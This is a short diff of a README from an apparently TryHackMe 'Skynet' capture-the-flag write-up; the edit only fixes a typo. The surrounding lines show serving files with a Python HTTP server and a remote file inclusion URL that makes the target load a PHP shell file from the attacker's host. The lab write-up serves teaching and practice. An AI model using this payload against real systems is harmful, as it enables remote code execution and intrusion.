twhelan25/tryhackme-Skynet-CTF-Writeup/README.md

 ```bash
 python3 -m http.server
 ```
-Our crafted payload should look like this, except the target IP and whatever your named your shell file:
+Our crafted payload should look like this, except the target IP and whatever you named your shell file:
 ```bash
 http://10.10.33.12/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.10.184.75:8000/monkey.php
 ```